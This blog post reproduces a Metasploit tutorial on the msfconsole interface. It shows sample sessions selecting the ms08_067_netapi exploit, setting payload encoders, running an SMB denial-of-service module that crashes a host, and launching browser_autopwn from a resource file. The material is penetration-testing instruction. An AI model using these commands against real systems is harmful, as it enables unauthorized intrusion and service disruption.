jeudi 25 février 2010

msfconsole

msfconsole

The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.

The msfconsole interface will work on Windows with the 3.3 release, however users of version 3.2 will need to either manually install the Framework under Cygwin, along with patching the Ruby installation, or access the console emulator via the included web or GUI components.

Benefits of the msfconsole:

  • It is the only supported way to access most of the features within Metasploit.
  • Provides a console-based interface to the framework
  • Contains the most features and is the most stable MSF interface
  • Full readline support, tabbing, and command completion
  • Execution of external commands in msfconsole is possible:

    msf > ping -c 1 192.168.1.2
    [*] exec: ping -c 1 192.168.1.2

    PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data.
    64 bytes from 192.168.1.2: icmp_seq=1 ttl=128 time=10.3 ms

    --- 192.168.1.2 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms
    msf >

Getting Help

Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.

msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
load Load a framework plugin
loadpath Searches for and loads modules from a path
quit Exit the console
resource Run the commands stored in a file
...snip...

tab completion

One of the more useful features of msfconsole is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to make use of. As with most other shells, entering what you know and pressing 'Tab' will present you with a list of options available to you or auto-complete the string if there is only one option.

msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/msdns_zonename
msf > use exploit/windows/smb/ms08_067_netapi

"show" Command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.

msf > show

Encoders
========

Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
...snip...

There are a number of 'show' commands you can use but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'.

Executing 'show auxiliary' will display a listing of all of the available auxiliary modules within Metasploit. Auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

Auxiliary
=========
Name Description
---- -----------
admin/backupexec/dump Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry Veritas Backup Exec Server Registry Access
admin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized Administrative Access
...snip...

Naturally, 'show exploits' will be the command you are most interested in running since at its core, Metasploit is all about exploitation. Run 'show exploits' to get a listing of all exploits contained in the framework.

msf > show exploits

Exploits
========
Name Description
---- -----------
aix/rpc_ttdbserverd_realpath ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow

...snip...

Running 'show payloads' will display all of the different payloads for all platforms available within Metasploit.

msf > show payloads

Payloads
========
Name Description
---- -----------
aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port AIX Command Shell, Find Port Inline
aix/ppc/shell_reverse_tcp AIX Command Shell, Reverse TCP Inline
...snip...

As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================

Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX or Win7)
...snip...

If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.

msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
...snip...

If you wish the further fine-tune an exploit, you can see more advanced options by running 'show advanced'.

msf exploit(ms08_067_netapi) > show advanced

Module advanced options:

Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port

...snip...

"search" Command


The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module references.

Note the naming convention for Metasploit modules uses underscores versus hyphens.


msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...

Auxiliary
=========

Name Description
---- -----------
dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset

"info" Command

The 'info' command will provide detailed information about a particular module including all options, targets, and other information.

msf > info dos/windows/smb/ms09_001_write

Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
Version: 6890
License: Metasploit Framework License (BSD)

Provided by:
j.v.vallejo

"use" Command

When you have decided on a particular module to make use of, issue the 'use' command to select it.

msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port

msf auxiliary(ms09_001_write) >

"connect" Command

By issuing the 'connect' command with an ip address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.

msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
ÿýÿýÿý!ÿûÿû
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
ÿ
DD-WRT login:

"set" Command

The 'set' command is used to configure the options and settings of the module you are currently working with.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 yes The target address
RPORT 445 yes Set the SMB service port

A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.

msf exploit(ms08_067_netapi) > show encoders

Compatible encoders
===================

Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder

msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

"check" command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.114 yes The target address
RPORT 42 yes The target port


Exploit target:

Id Name
-- ----
0 Windows 2000 English


msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

Setting Global Variables

In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time your start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
msf > save
Saved configuration to: /root/.msf3/config
msf >

"exploit/run" Commands

When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.

msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...snip...

"back" Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back
msf >

"resource" Command

Some attacks such as Karmetasploit use a resource file that you can load through the msfconsole using the 'resource' command. These files are a basic scripting for msfconsole. It runs the commands in the file in sequence. Later on we will discuss how, outside of Karmetasploit, that can be very useful.

msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
...snip...

"irb" Command

Running the 'irb' command will drop you into ruby scripting mode where you can issue commands and create scripts on the fly.

msf > irb
[*] Starting IRB shell...

>> puts "Hello, metasploit!"
Hello, metasploit!



© Offensive Security 2009

Publié par à

1 commentaire:

Inscription à : Publier les commentaires (Atom)